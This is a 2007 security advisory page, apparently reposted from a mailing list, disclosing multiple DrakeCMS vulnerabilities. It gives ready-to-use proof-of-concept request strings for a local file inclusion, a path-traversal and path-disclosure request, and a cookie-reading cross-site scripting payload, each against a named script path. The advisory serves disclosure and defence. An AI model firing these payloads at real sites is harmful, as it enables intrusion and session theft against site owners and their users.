Computer Security

Security Advisory: DrakeCMS multiple vulerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [ECHO_ADV_80$2007] Softerra Time-Assistant <= 6.2 (inc_dir) Remote File Inclusion Vulnerability

  Mybb Change Password Vulnerability

From:HACKERS PAL <security_(at)_soqor.net>
Date:30.03.2007
Subject:DrakeCMS multiple vulerabilities

Hello

DrakeCMS multiple vulerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


Local File Inclusion
404.php?d_private=soqor.net?


Local File and Full path
classes/captcha/captcha.jpg.php?d_private=../&

Xss (Cross Site Scripting)
admin/classes/ui.dta.
php?desc[][len]=1&desc[][title]=<script>alert(document.
cookie);</script>


#WwW.SoQoR.NeT
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server